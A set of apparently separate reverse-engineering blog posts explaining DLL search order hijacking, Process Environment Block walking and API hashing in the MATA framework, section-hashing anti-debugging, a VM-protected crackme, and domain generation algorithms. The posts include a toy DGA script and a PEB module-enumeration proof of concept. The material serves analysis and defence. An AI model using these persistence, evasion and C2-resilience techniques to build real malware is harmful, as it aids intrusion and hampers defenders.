The DLL Search Order And Hijacking It
If you ever used Process Monitor to track activity of a process, you might have encountered the following pattern:

The image above is a snippet from events captured by Process Monitor during the execution of x32dbg.exe on Windows 7. DNSAPI.DLL and IPHLPAPI.DLL are stored in the System directory, so you might ask yourself:
Why would Windows try to search for either of these DLLs in the application directory first?
Operating systems are very complex, and so is the challenge of implementing a fault-tolerant system to search for dependencies such as dynamic-link libraries. Today, we'll talk about DLL Search Order and DLL Search Order Hijacking, in particular how it works and how adversaries can abuse it.
DLL Search Order
First, we have to talk about what happens when a PE File is executed on the Windows system.
The majority of native binaries you encounter on Windows are dynamically linked. This means that at the start of execution, the loader uses information embedded in the binary to locate the DLLs that the process depends on. In contrast to a statically linked binary, a dynamically linked executable uses the libraries provided by the OS instead of having them compiled into the executable itself.
Before the dynamically linked executable can load and use these libraries, it has to know where these dependencies are stored on disk or whether they are already in memory. This is where the DLL Search Order comes into play. To keep it simple, we will focus only on Windows desktop applications.
Pre-Checks and In-Memory Search
Before Windows starts searching for the needed DLL on disk, it first attempts to find the module in memory. If a DLL is already in memory, it will not be loaded again. This part is a little complicated and out of scope for this blog article, since we would have to define what "loaded" even means. If you are interested in this first check, I advise you to look up the official Microsoft documentation[1].
If the memory check fails, Windows can fall back to a list of known DLLs. If the needed library is part of that list, Windows uses its copy of the known DLL. The list of known DLLs is stored in the Windows Registry.

On-Disk Search
If the first two checks fail, the OS has to search for the DLL on disk. Depending on the OS settings, Windows uses a different search order. By default, Windows enables the SafeDllSearchMode feature to harden the system against DLL Search Order Hijacking attacks, a technique we will explain in the upcoming section.
The registry value that controls the feature is:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\SafeDllSearchMode
Let's take a look at how the search order differs depending on whether SafeDllSearchMode is enabled or not.

We can clearly see that the current directory is prioritised if SafeDllSearchMode is disabled, and this can be abused by adversaries. Abusing this search order flow is called DLL Search Order Hijacking.
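The two search orders can also be written down as a short Python sketch. It follows the order Microsoft documents for desktop applications; the function name, its parameters and the default directory paths are illustrative assumptions and not part of any Windows API.

```python
def dll_search_order(app_dir, current_dir, path_dirs, safe_mode=True,
                     system_dir=r"C:\Windows\System32",
                     system16_dir=r"C:\Windows\System",
                     windows_dir=r"C:\Windows"):
    """Return the on-disk directories in the order they would be searched.

    The in-memory check and the known DLLs list come before this step
    and are not modelled here.
    """
    system_dirs = [system_dir, system16_dir, windows_dir]
    if safe_mode:
        # SafeDllSearchMode enabled: the current directory moves behind
        # the system and Windows directories.
        order = [app_dir] + system_dirs + [current_dir]
    else:
        # SafeDllSearchMode disabled: the current directory is searched
        # right after the application directory.
        order = [app_dir, current_dir] + system_dirs
    # The directories from the PATH environment variable always come last.
    return order + list(path_dirs)


if __name__ == "__main__":
    for mode in (True, False):
        print(f"SafeDllSearchMode={mode}")
        for directory in dll_search_order(r"C:\app", r"C:\work", [r"C:\tools"], mode):
            print("   ", directory)
```

Note that the application directory comes first in both modes, which is exactly what the hijacking technique in the next section relies on.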
DLL Search Order Hijacking
Adversaries can abuse the search order flow displayed above to load their own malicious DLLs into memory instead of the legitimate ones. There are many ways this technique can be used. However, it is more effective for achieving persistence on the target system than for initial execution.
Let's take a step back and revisit our example from above:
- x32dbg.exe tries to load DNSAPI.DLL
- DNSAPI.DLL is not in the list of known DLLs and is also not loaded into memory
- Since SafeDllSearchMode is enabled, Windows falls back to the system directory if the DLL is not found in the application directory
What would happen if we crafted a malicious DLL named DNSAPI.DLL and placed it into the application directory?
We would be able to hijack the search order flow and force a legitimate application to load our malicious code into memory.
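To make the effect tangible without touching a real system, the lookup can be simulated with temporary directories. This is only a sketch: `resolve_dll` and `demo` are hypothetical helpers, the "DLLs" are empty files, and the real loader does far more than a directory listing.

```python
import os
import tempfile


def resolve_dll(name, search_dirs):
    """Return the first path in search_dirs that contains `name`, else None.

    The comparison ignores case, like file names on Windows.
    """
    for directory in search_dirs:
        try:
            entries = os.listdir(directory)
        except OSError:
            continue  # directory does not exist or is not readable
        for entry in entries:
            if entry.lower() == name.lower():
                return os.path.join(directory, entry)
    return None


def demo():
    """Show that a DLL planted in the application directory wins the lookup."""
    with tempfile.TemporaryDirectory() as root:
        app_dir = os.path.join(root, "app")
        system_dir = os.path.join(root, "system32")
        os.makedirs(app_dir)
        os.makedirs(system_dir)
        order = [app_dir, system_dir]  # application directory comes first

        # Only the legitimate copy exists.
        open(os.path.join(system_dir, "dnsapi.dll"), "wb").close()
        before = resolve_dll("DNSAPI.DLL", order)

        # The attacker drops a DLL with the same name next to the executable.
        open(os.path.join(app_dir, "dnsapi.dll"), "wb").close()
        after = resolve_dll("DNSAPI.DLL", order)

        return (os.path.dirname(before) == system_dir,
                os.path.dirname(after) == app_dir)


if __name__ == "__main__":
    print(demo())
```

The same helper can be turned around for defence: any DLL in an application directory that shadows a name from the system directory deserves a closer look.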
Practical Use Case
Let's take a look at a simple practical example. Our application calls LoadLibraryA and tries to load dnsapi.dll, as in our example from above. Next, we craft a small DLL that does nothing but create a message box in its DllMain function. Once the DLL is loaded into memory, DllMain is invoked.
In the first run, we do not place the crafted DLL in the application directory. As expected, Windows will load dnsapi.dll
from the system
directory:

Next, we name our crafted DLL dnsapi.dll and place it in the application directory:

Whoops! I think we can all think of a couple of ways in which APT groups and malware can abuse this technique to achieve persistence on the victim's system.
Real world examples and APTs
For the sake of keeping it simple and explaining the core principles behind this persistence technique, we've built a very simple use case here. Of course, the real world looks a little different, and attackers usually have to take into account:
- Endpoint security solutions with signature-based and behaviour-based detections that prevent such attacks
- Programmatic dependencies, which won't allow you to just replace a DLL in an application directory and hope that it will work just fine
- and many more
However, if you had never heard of this technique before, I hope I was able to create some awareness of it!
PEB: Where Magic Is Stored
As a reverse engineer, every now and then you encounter a situation where you dive deeper than usual into the internal structures of an operating system. Be it out of simple curiosity, or because you need to understand how a binary uses specific parts of the operating system in certain ways. One of the more interesting structures in Windows is the Process Environment Block (PEB). In this article, I'd like to introduce you to this structure and talk about various ways adversaries can abuse it for their own purposes.
Introducing PEB
The Process Environment Block is a critical structure in the Windows OS; most of its fields are not intended to be used by anything other than the operating system. It contains data structures that apply across a whole process and is stored in user-mode memory, which makes it accessible to the corresponding process. The structure contains valuable information about the running process, including:
- whether the process is being debugged or not
- which modules are loaded into memory
- the command line used to invoke the process
All this information gives adversaries a number of possibilities to abuse it. The listing below shows the layout of the PEB structure:
typedef struct _PEB {
    BYTE Reserved1[2];
    BYTE BeingDebugged;
    BYTE Reserved2[1];
    PVOID Reserved3[2];
    PPEB_LDR_DATA Ldr;
    PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
    PVOID Reserved4[3];
    PVOID AtlThunkSListPtr;
    PVOID Reserved5;
    ULONG Reserved6;
    PVOID Reserved7;
    ULONG Reserved8;
    ULONG AtlThunkSListPtr32;
    PVOID Reserved9[45];
    BYTE Reserved10[96];
    PPS_POST_PROCESS_INIT_ROUTINE PostProcessInitRoutine;
    BYTE Reserved11[128];
    PVOID Reserved12[1];
    ULONG SessionId;
} PEB, *PPEB;
Now that we've talked a little about the layout and purpose of the structure, let's take a look at a few use cases.
Reading the BeingDebugged flag
The most obvious use is to check the BeingDebugged flag to identify whether a debugger is attached to the process. By reading the flag directly from memory instead of using the usual suspects like NtQueryInformationProcess or IsDebuggerPresent, malware can avoid noisy WinAPI calls. This makes the technique harder to spot.
However, most debuggers already take care of this. x64dbg, for example, has an option to hide the debugger by modifying the PEB structure at the start of the debugging session.
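Both sides of this cat-and-mouse game boil down to one byte. The following sketch works on a raw copy of the first bytes of a PEB, for example taken from a memory dump; the helper names are made up for illustration and the offset follows from the structure layout shown above (two reserved bytes, then BeingDebugged).

```python
# BeingDebugged follows BYTE Reserved1[2], so it sits at offset 2 of the PEB.
BEING_DEBUGGED_OFFSET = 2


def being_debugged(peb: bytes) -> bool:
    """Return True if the BeingDebugged byte of a raw PEB copy is non-zero."""
    return peb[BEING_DEBUGGED_OFFSET] != 0


def hide_debugger(peb: bytes) -> bytes:
    """Return a copy of the PEB with the BeingDebugged byte cleared.

    This mirrors, in a very simplified way, what a "hide debugger"
    option has to do to the structure.
    """
    patched = bytearray(peb)
    patched[BEING_DEBUGGED_OFFSET] = 0
    return bytes(patched)


if __name__ == "__main__":
    dumped = bytes([0x00, 0x00, 0x01, 0x00]) + bytes(12)  # fabricated sample
    print(being_debugged(dumped))                 # flag is set in the sample
    print(being_debugged(hide_debugger(dumped)))  # flag cleared by the patch
```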
Iterating through loaded modules
Another use case could be iterating over the loaded modules to discover DLLs that were injected into memory in order to monitor the running process. To understand how to achieve this, we need to take a look at the PEB_LDR_DATA structure, which the PEB references through its Ldr field:
typedef struct _PEB_LDR_DATA {
    BYTE Reserved1[8];
    PVOID Reserved2[3];
    LIST_ENTRY InMemoryOrderModuleList;
} PEB_LDR_DATA, *PPEB_LDR_DATA;
PEB_LDR_DATA contains the head of a doubly linked list named InMemoryOrderModuleList. Each item in this list is a structure of type LDR_DATA_TABLE_ENTRY, which contains all the information we need to iterate over the loaded modules. See the structure of LDR_DATA_TABLE_ENTRY below:
typedef struct _LDR_DATA_TABLE_ENTRY {
    PVOID Reserved1[2];
    LIST_ENTRY InMemoryOrderLinks;
    PVOID Reserved2[2];
    PVOID DllBase;
    PVOID EntryPoint;
    PVOID Reserved3;
    UNICODE_STRING FullDllName;
    BYTE Reserved4[8];
    PVOID Reserved5[3];
    union {
        ULONG CheckSum;
        PVOID Reserved6;
    };
    ULONG TimeDateStamp;
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
So by iterating over the doubly linked list, we are able to discover the base address and full name of all modules loaded into the memory of the running process. The snippet below is a small proof of concept. It iterates over the linked list and prints each library name to stdout. I created it for the purpose of this blog article. You are free to use it; I will also upload it to my GitHub repo in the upcoming days:
#include <Windows.h>
#include <cstdio>

typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

// LDR_DATA_TABLE_ENTRY as seen from its InMemoryOrderLinks member,
// i.e. without the two leading Reserved1 pointers
typedef struct _LDR_DATA_TABLE_ENTRY_MOD {
    LIST_ENTRY InMemoryOrderLinks;
    PVOID Reserved2[2];
    PVOID DllBase;
    PVOID EntryPoint;
    PVOID Reserved3;
    UNICODE_STRING FullDllName;
    BYTE Reserved4[8];
    PVOID Reserved5[3];
    union {
        ULONG CheckSum;
        PVOID Reserved6;
    };
    ULONG TimeDateStamp;
} LDR_DATA_TABLE_ENTRY_MOD, *PLDR_DATA_TABLE_ENTRY_MOD;

int main(void) {
    PLIST_ENTRY head = NULL;

    // 32-bit only: MSVC inline assembly
    __asm {
        mov eax, fs:[0x30]      // TEB -> PEB
        mov eax, [eax + 0xC]    // PEB -> Ldr
        add eax, 0x14           // address of Ldr->InMemoryOrderModuleList (list head)
        mov head, eax
    }
    printf("[+] Initialised pointer to the head of InMemoryOrderModuleList\n");

    // Loop as long as we don't reach the head of the linked list again
    for (PLIST_ENTRY cur = head->Flink; cur != head; cur = cur->Flink) {
        PLDR_DATA_TABLE_ENTRY_MOD lib = (PLDR_DATA_TABLE_ENTRY_MOD)cur;
        printf("[+] %S\n", lib->FullDllName.Buffer);
    }

    printf("[+] Done!\n");
    return 0;
}
If you are wondering how I am able to access the PEB in the code above, take a look at the inline assembly in the main function, especially the instruction mov eax, fs:[0x30]. FS is a segment register, similar to GS. On 32-bit Windows, FS points to the Thread Environment Block and can be used to access thread-specific memory. Offset 0x30 holds the linear address of the Process Environment Block.
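The same pointer chase can be replayed offline on a memory snapshot, which is handy when you only have a dump of a 32-bit process. The sketch below is an assumption-laden illustration: the `Snapshot` class and `loaded_modules` are hypothetical helpers, and the offsets (TEB+0x30, PEB+0x0C, Ldr+0x14, and the entry fields relative to InMemoryOrderLinks) are the 32-bit values that follow from the structures shown above.

```python
import struct


class Snapshot:
    """A flat 32-bit memory snapshot: `data` is mapped at address `base`."""

    def __init__(self, base, data):
        self.base = base
        self.data = bytes(data)

    def u16(self, addr):
        return struct.unpack_from("<H", self.data, addr - self.base)[0]

    def u32(self, addr):
        return struct.unpack_from("<I", self.data, addr - self.base)[0]

    def wstr(self, addr, nbytes):
        off = addr - self.base
        return self.data[off:off + nbytes].decode("utf-16-le")


def loaded_modules(mem, teb):
    """Walk InMemoryOrderModuleList and return (DllBase, FullDllName) pairs."""
    peb = mem.u32(teb + 0x30)      # same value as mov eax, fs:[0x30]
    ldr = mem.u32(peb + 0x0C)      # PEB.Ldr
    head = ldr + 0x14              # address of InMemoryOrderModuleList
    modules = []
    cur = mem.u32(head)            # head.Flink points to the first entry
    while cur != head:             # the list is circular
        dll_base = mem.u32(cur + 0x10)   # LIST_ENTRY (8) + Reserved2[2] (8)
        length = mem.u16(cur + 0x1C)     # FullDllName.Length in bytes
        buffer = mem.u32(cur + 0x20)     # FullDllName.Buffer
        modules.append((dll_base, mem.wstr(buffer, length)))
        cur = mem.u32(cur)               # follow InMemoryOrderLinks.Flink
    return modules
```

Because the loop stops when it is back at the list head, it does not depend on what happens to be stored behind the head inside PEB_LDR_DATA.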
Finally, we want to take a look at a real world example of how PEB
can be abused.
How the MATA Framework abuses PEB
This use case was introduced to me while reverse engineering a Windows variant of the MATA Framework. According to Kaspersky[1], the MATA Framework is used by the Lazarus group and targets multiple platforms.
Malware authors have a high interest in obfuscation, because it increases the time needed to reverse engineer their code. One way to hide API calls is to use API Hashing. I have written about DanaBot's API Hashing[2] before and how to overcome it. MATA also uses this technique.
However, instead of using WinAPI calls to retrieve the addresses of DLLs loaded into memory, MATA abuses the Process Environment Block to fetch their base addresses. Let's take a look at how MATA for Windows achieves this:
MATA API Hashing
The APIHashing method takes an integer as its only parameter: the hash of the corresponding API call.

Right after the prologue, it retrieves a pointer to the PEB by reading it from the Thread Environment Block via the segment register GS. Similar to our proof of concept above, MATA then fetches the address of the head of the linked list provided by InMemoryOrderModuleList. Each item of the linked list provides the DLL base address of the corresponding loaded module.
From there, the malware reads the e_lfanew field, which contains the offset of the PE header. By adding the base address, e_lfanew and 0x88, it jumps directly to the data directories of the corresponding PE. From the data directories, MATA accesses the exported function names in a similar way to what I've described in my blog article about DanaBot's API Hashing[3]. The hashing algorithm is fairly simple. In each iteration, the integer value of the current character is added to the hash and the result is rotated right (ROR) by 0xD. If the final hash matches the input parameter, the address of the function is retrieved. The following figure explains the function at a high level:
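As a complement to the figure, the add-and-rotate scheme can be sketched in a few lines of Python. This is a reconstruction from the description above and not MATA's verified routine: the 32-bit width, the initial value of 0 and the exact order (add first, then rotate) are assumptions.

```python
def ror32(value, count):
    """Rotate a 32-bit value right by `count` bits."""
    count %= 32
    value &= 0xFFFFFFFF
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF


def add_ror13_hash(name):
    """Add each character to the hash, then rotate the sum right by 0xD.

    Assumed details: 32-bit arithmetic, initial hash 0, add before rotate.
    """
    h = 0
    for ch in name:
        h = ror32((h + ord(ch)) & 0xFFFFFFFF, 0xD)
    return h


if __name__ == "__main__":
    for api in ("LoadLibraryA", "GetProcAddress"):
        print(f"{api}: {add_ror13_hash(api):#010x}")
```

With such a function at hand, an analyst can precompute the hashes of all exports of the usual system DLLs and look up the constants found in the sample.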

Learning from each other
That's it for this blog article, I hope you enjoyed it! There are probably many more use cases and real-world examples of how the PEB is and can be abused. If you can think of another one, feel free to leave a comment below and share it, so that we can learn from each other!
Catching Debuggers with Section Hashing
As a reverse engineer, you will always have to deal with various anti-analysis measures. The number of ways to hamper our work is endless. Not only will you have to deal with code obfuscation that hinders your static analysis, but also with tricks that prevent you from debugging the software you want to dig deeper into. Today, I want to present Section Hashing to you.
I will begin by explaining how software breakpoints work internally and then give you an example of a Section Hashing
implementation.
Debuggers - How software breakpoints work
When you set a breakpoint at a specific instruction in your favourite debugger, the debugger temporarily replaces it with another instruction, which causes a fault or an interrupt. On x86, this is very often the INT 3 instruction, which is encoded as the opcode 0xCC. We can examine what this looks like in RAM.
We open x32dbg.exe
and debug a 32 bit PE and set a breakpoint near the entry point.

When setting a breakpoint, you will see the original instruction instead of the patched one in the debugger. However, we can examine the same memory page in RAM with ProcessHacker.

In volatile memory, the byte 33 changed to CC, which will cause the program to halt when it is reached. This software interrupt is then handled by the debugger, which restores the original byte.
Catching Breakpoints with Section Hashing
After explaining how software breakpoints work, I'll now get to the real topic of this article. For this example, we move to the Linux world.
A software breakpoint is nothing more than a modification of the executable code in RAM. Once a breakpoint is set, the .text section is modified. A well-known technique to catch such breakpoints in RAM is called Section Hashing.
Authors can embed the hash of the .text section in the binary. Upon execution, they use the same algorithm to generate a new hash from the .text section. If a software breakpoint is set, the hash will differ from the embedded hash. An example implementation can look like this:

In this case, a hash of the .text section is generated. Afterwards it is used to influence the generation of the flag. If a software breakpoint is set during execution, a wrong hash will be generated.
This is a simple example of Section Hashing. In combination with code obfuscation and other anti-analysis measures, it can be very hard to spot this technique. It is also occasionally used by commercial packers.
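The principle is easy to reproduce on a byte string that stands in for the .text section. The sketch below is not the implementation from the challenge: SHA-256 is used as a stand-in hash, the seven code bytes are a hand-assembled toy function, and all helper names are invented for the example.

```python
import hashlib

# push ebp; mov ebp, esp; xor eax, eax; pop ebp; ret
TEXT_SECTION = bytes.fromhex("558bec33c05dc3")


def section_hash(code: bytes) -> str:
    """Hash the bytes of a code section (SHA-256 as a stand-in)."""
    return hashlib.sha256(code).hexdigest()


def set_breakpoint(code: bytes, offset: int) -> bytes:
    """Simulate a software breakpoint: overwrite one byte with INT 3 (0xCC)."""
    patched = bytearray(code)
    patched[offset] = 0xCC
    return bytes(patched)


def is_tampered(code: bytes, expected: str) -> bool:
    """Compare the current section hash with the embedded reference hash."""
    return section_hash(code) != expected


if __name__ == "__main__":
    embedded = section_hash(TEXT_SECTION)     # computed at build time
    debugged = set_breakpoint(TEXT_SECTION, 3)  # 0x33 becomes 0xCC
    print(is_tampered(TEXT_SECTION, embedded))  # untouched code
    print(is_tampered(debugged, embedded))      # code with a breakpoint
```

A protection that feeds the hash into later computations, as in the example described above, never needs an explicit comparison like `is_tampered`, which makes it harder to patch out.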
Defeating Section Hashing
There are multiple ways to defeat this technique, some of them could be:
- Patching instructions
- Using hardware breakpoints
Instead of modifying the code in RAM, hardware breakpoints on x86 use dedicated debug registers to halt the execution. However, hardware breakpoints are still detectable.
On Windows, the program can fetch the thread CONTEXT via GetThreadContext to see whether the debug registers are in use. A great example of how this is implemented can be found here[1]. If you are interested in trying to defeat Section Hashing yourself, you can try it at root-me.org[2].
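What such a check looks at can be sketched independently of the Windows API. The snippet below assumes the debug register values have already been read, for example from a CONTEXT structure, and are handed over as a plain dictionary; the function names and the dictionary layout are illustrative choices. The bit layout of DR7 (a local and a global enable bit per breakpoint slot in the low eight bits) is the documented x86 one.

```python
def enabled_hw_breakpoints(dr7):
    """Return the breakpoint slots (0-3) that are enabled in DR7.

    Bits 0/1 enable slot 0 (local/global), bits 2/3 slot 1, and so on.
    """
    return [slot for slot in range(4) if (dr7 >> (2 * slot)) & 0b11]


def debugger_suspected(context):
    """Return True if any debug address register or enable bit is set.

    `context` is a dict with the keys Dr0, Dr1, Dr2, Dr3 and Dr7.
    """
    addresses_set = any(context.get(f"Dr{i}", 0) for i in range(4))
    return addresses_set or bool(enabled_hw_breakpoints(context.get("Dr7", 0)))


if __name__ == "__main__":
    clean = {"Dr0": 0, "Dr1": 0, "Dr2": 0, "Dr3": 0, "Dr7": 0}
    traced = {"Dr0": 0x401000, "Dr1": 0, "Dr2": 0, "Dr3": 0, "Dr7": 0b01}
    print(debugger_suspected(clean), debugger_suspected(traced))
```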
Taming Virtual Machine Based Code Protection - 2
In the last episode ...
As you've probably guessed, this is the second part of my journey to reverse engineer a virtual machine protected binary. If you haven't read the first part[1], I encourage you to do so, because I will not repeat everything here. While the first part dealt with explaining the virtual environment and giving an initial look into the virtual machine's custom instruction set, this time I will focus on disassembling the virtual machine code completely.
I might repeat some steps from the first part again, mostly because I felt that it was necessary to do so :-).
Into the battle
We already explained the environmental setup in the previous blog post and also identified the main loop, which is responsible for instruction execution.

Each iteration, an instruction is parsed and the final CALL
in the left branch of figure 1 executes the instruction.
Critical functions
I covered the instruction parsing process in my last blog article a little bit. But since we are going to build a disassembler, I will explain the most important routines once again.
0x4013DF / ParseInstruction
This function is called each iteration in the loop from figure 1 and is responsible for parsing the byte codes.

In each iteration, the Virtual Instruction Pointer/VIP is retrieved, pointing at the instruction to execute. Each instruction is parsed. This function is fully responsible for transforming the bytes into a format that can be processed further. Let's take a look at how the first three instructions are parsed:

If you are interested in understanding this format fully, I recommend you to jump to the disassembler code[2]. I will only cover the first instruction here.
So how do we get from 03 15 03 00 04 to the parsed format?
The first byte is always the instruction id. 03 is the id of the PUSH instruction. The second byte is divided into its upper 6 bits and lower 2 bits, which represent the instruction size and the number of operands used by this instruction. The next bytes represent a single operand. In the example above, the first operand config, 00 03 00 00, is the configuration for USE 32 BIT OF REGISTER, SPECIFIED BY THE NEXT DWORD 04 00 00 00. The next DWORD is 04 00 00 00, which is the fourth virtual register. Now what is the fourth register here? Let's take a quick look at the instructions.
PUSH VR4
MOV VR4, VR7
SUB VR7, 0xB4
This looks very similar to the usual function prologue ;-). So the fourth register must be EBP!
PUSH EBP
MOV EBP, ESP
SUB ESP, 0xB4
0x401271 / GetOpval & 0x401322 / StoreOpval
I will not cover these two functions in depth here. If you take a look at figure 3 again, you will see that I mention the operand configs
. These functions are responsible for filling the operands according to these configs.
In the example above, the SUB VR7, 0xB4 instruction uses 00030000 07000000 for the first operand and 00020000 B4000000 for the second operand. If you reverse engineer every single option, you will find that the following configurations exist:
# First DWORD CONFIG
00000000 ==> LOWEST BYTE OF REG X # f.e. AL
00010000 ==> SECOND LOWEST BYTE OF REG X # f.e. AH
00020000 ==> LOWER 16 BIT OF REG X # f.e. AX
00030000 ==> 32 BIT OF REG X # f.e. EAX
01000000 ==> BYTE AT LOC
01010000 ==> BYTE AT LOC
01020000 ==> WORD AT LOC
01030000 ==> DWORD AT LOC
02000000 ==> BYTE FROM IMM.
02010000 ==> BYTE FROM IMM.
02020000 ==> WORD FROM IMM.
02030000 ==> DWORD FROM IMM.
# Second DWORD CONFIG, if register
00000000 ==> EAX
01000000 ==> EBX
02000000 ==> ECX
03000000 ==> EDX
04000000 ==> EBP
05000000 ==> ESI
06000000 ==> EDI
07000000 ==> ESP
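The table translates almost directly into a small decoder. The following sketch only covers what is stated in this article: the header byte layout (upper 6 bits size, lower 2 bits operand count) and the two config DWORDs of a parsed operand. The function names and the returned tuples are my own choices for illustration; the actual disassembler is written in C++ and is structured differently.

```python
import struct

REGISTERS = ["EAX", "EBX", "ECX", "EDX", "EBP", "ESI", "EDI", "ESP"]
KINDS = {0: "reg", 1: "mem", 2: "imm"}
REG_WIDTHS = ["lowest byte", "second lowest byte", "lower 16 bit", "32 bit"]
DATA_WIDTHS = ["byte", "byte", "word", "dword"]


def decode_header(raw):
    """Return (instruction id, instruction size, operand count)."""
    instruction_id = raw[0]
    size = raw[1] >> 2        # upper 6 bits
    operands = raw[1] & 0b11  # lower 2 bits
    return instruction_id, size, operands


def decode_operand(config, value):
    """Decode a parsed operand: 4 config bytes followed by a 4-byte value."""
    kind = KINDS[config[0]]    # first config byte: register, memory, immediate
    width = config[1]          # second config byte: access width
    number = struct.unpack("<I", value)[0]
    if kind == "reg":
        return kind, REG_WIDTHS[width], REGISTERS[number]
    return kind, DATA_WIDTHS[width], number


if __name__ == "__main__":
    print(decode_header(bytes.fromhex("0315030004")))
    print(decode_operand(bytes.fromhex("00030000"), bytes.fromhex("04000000")))
```

For the PUSH example, the header decodes to a size of 5 bytes and one operand, which matches the five raw bytes 03 15 03 00 04.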
Eternal Debugging
Now we can use this knowledge to get an initial understanding of what is happening and to verify whether we are able to decode instructions manually.

If you take a look at the last instructions, you will see that there are some constants pushed into memory. If you google these constants, you will come to the conclusion that this must be the MD5 Init
routine[3]. The next step is to build a disassembler.
Disassembling the code
I wrote this one in C++ and you can find the source code on my GitHub page[4]. Writing this in Python would have been possible too ... and probably a lot easier and faster, but I chose C++ for learning purposes. If my C++ is awful, forgive me. We all start somewhere ;-).

Our disassembler does have some limitations though. The disassembly was complex and I believe that some memory address offsets and register sizes are wrong. Also, I did not reverse engineer all instructions. However, that should not be a problem, because we only need to understand what is happening here on a higher level.
Identifying the algorithm
We already spotted the variables, which we also found in the MD5.c source code(f.e. 0x2381bc0
). However, the actual hashing algorithm does not match the original one. Therefore it seems to be some kind of a modified version of it. Furthermore we spot a routine, which seems to be the XTEA algorithm[5].

Final words
So that's basically it. I don't know when or if I will write a third part covering the serial key generator. When I started this challenge, I was only interested in learning how to disassemble custom instruction sets.
If you are interested in how others solved this challenge, I recommend you to read the tutorials from wagonono and kernelj, they both completely solved this challenge[6]. Wagonono also created a disassembler and his version is better than mine.
DGAs - Generating domains dynamically
A domain generation algorithm is a routine/program that generates a domain dynamically. Think of the following example:
An actor registers the domain evil.com
. The corresponding backdoor has this domain hardcoded into its code. Once the attacker infects a target with this malware, it will start contacting its C2 server.
As soon as a security company obtains the malware, it might blacklist the registered domain evil.com
. This will hinder any attempts of the malware to receive commands from the original C2.
If a domain generation algorithm had been used instead, the domain would be generated based on a seed. The current date, for example, is a popular seed amongst malware authors. Simple domain blacklisting would not solve the problem, and the security company would have to resort to different methods.
By generating domains dynamically, it is harder for defenders to hinder the malware from contacting its C2 server. It will be necessary to understand the algorithm.
Example implementation of a DGA
A quick & dirty implementation (loosely based on Wikipedia[1]) of such an algorithm could look like this:
"""Example implementation of a domain generation algorithm."""
import sys
import time
import random


def gen_domain(month, day, hour, minute):
    """Generate the domain based on time. Return domain"""
    print(f"[+] Gen domain based on month={month} day={day} hour={hour} min={minute}")
    domain = ""
    for i in range(8):
        month = (month * 8) ^ 0xF
        day = (day * 8) ^ 0xF
        hour = (hour * 8) ^ 0xF
        minute = (minute * 8) ^ 0xF
        # Map the product onto a lowercase letter ('a' to 'y')
        domain += chr(((month * day * hour * minute) % 25) + 0x61)
    return domain + ".com"


try:
    while True:
        # Random values stand in for the current date and time
        d = gen_domain(random.randint(1, 12), random.randint(1, 30),
                       random.randint(0, 23), random.randint(0, 59))
        print(f"[+] Generated domain = {d}")
        time.sleep(5)
except KeyboardInterrupt:
    sys.exit()
In a real scenario, our DGA would use the current date and time as a seed; the demo loop feeds it random values instead. Each parameter is multiplied by 8 and XOR'd with 0xF. Finally, all four values are multiplied with each other. The final operations make sure that we generate a lowercase character. The output of this program looks like this:
[+] Gen domain based on month=12 day=2 hour=4 min=4
[+] Generated domain = taavtaab.com
[+] Gen domain based on month=3 day=10 hour=11 min=36
[+] Generated domain = kugxfkvx.com
[+] Gen domain based on month=2 day=27 hour=4 min=1
[+] Generated domain = kaasuapn.com
Seed or Dictionary based
There are two main approaches to implementing a domain generation algorithm: seed based and dictionary based. For the sake of keeping this simple, we will not focus on the hybrid approach.

Seed based Approach
We already introduced the first one. Our implementation is an algorithm based on a seed, which serves as the input. Another example I can provide is how APT34 used such a seed based algorithm in a campaign targeting a government organisation in the Middle East. The campaign was discovered by FireEye[2].
The mentioned APT group used domain generation algorithms in one of their downloaders. The downloader was named BONDUPDATER by FireEye and is implemented in the PowerShell scripting language.

The first 12 characters of the UUID are extracted. Next, the program enters a loop. In each iteration, a new random number is generated and the domain is built by concatenating hardcoded and generated values. GetHostAddresses then tries to resolve the generated domain. If it fails, a new iteration starts. Once a registered domain is generated and resolved, the loop is left.
Depending on the resolved IP address, the script triggers different actions.
Dictionary based Approach
The second approach is to create a dictionary based domain generation algorithm. Instead of focusing on a seed, a list of words is provided. The algorithm randomly selects words from these lists, concatenates them and generates a new domain. Suppobox[3] is a malware family that implements the dictionary based approach[4].
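A minimal sketch of the dictionary based idea could look like the snippet below. It is not Suppobox's algorithm: the word lists, the TLD and the function name are made up, and the random generator is seeded so that malware and operator would arrive at the same domain for the same seed.

```python
import random

# Hypothetical word lists; real families ship their own, much longer lists.
WORDS_A = ["silver", "quiet", "rapid", "orange"]
WORDS_B = ["river", "window", "garden", "bridge"]


def dict_domain(seed, tld=".net"):
    """Pick one word from each list, driven by a seeded random generator."""
    rng = random.Random(seed)
    return rng.choice(WORDS_A) + rng.choice(WORDS_B) + tld


if __name__ == "__main__":
    for seed in range(3):
        print(dict_domain(seed))
```

Domains built from real words look far less suspicious than random character strings, which is why this approach is harder to catch with simple entropy checks.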
Defeating Domain Generation Algorithms
The straightforward way to counter these algorithms is to reverse engineer the routine and predict future domains. One famous case of predicting future domains is the takedown of the Necurs botnet by Microsoft[5]. By understanding the DGA, they were able to predict the domains for the next 25 months.
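Once the routine is understood, prediction is just a matter of running it for future seeds. The sketch below reuses the toy algorithm from this article (re-implemented without the print statement) and assumes, purely for illustration, that the malware generates one domain per day at a fixed hour and minute; `predict_domains` is a hypothetical helper.

```python
from datetime import date, timedelta


def gen_domain(month, day, hour, minute):
    """Toy DGA from this article, returning only the 8-character label."""
    domain = ""
    for _ in range(8):
        month = (month * 8) ^ 0xF
        day = (day * 8) ^ 0xF
        hour = (hour * 8) ^ 0xF
        minute = (minute * 8) ^ 0xF
        domain += chr(((month * day * hour * minute) % 25) + 0x61)
    return domain


def predict_domains(start, days, hour=0, minute=0, tld=".com"):
    """Return (date, domain) pairs for `days` consecutive days from `start`."""
    predictions = []
    for offset in range(days):
        current = start + timedelta(days=offset)
        label = gen_domain(current.month, current.day, hour, minute)
        predictions.append((current, label + tld))
    return predictions


if __name__ == "__main__":
    for when, domain in predict_domains(date(2021, 1, 1), 5):
        print(when.isoformat(), domain)
```

The resulting list can be fed into a blocklist or used to register the domains before the attacker does.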
I am not an ML magician. However, a quick Google search shows that there is a lot of research going on. Machine learning based approaches to countering DGAs seem to be promising too.
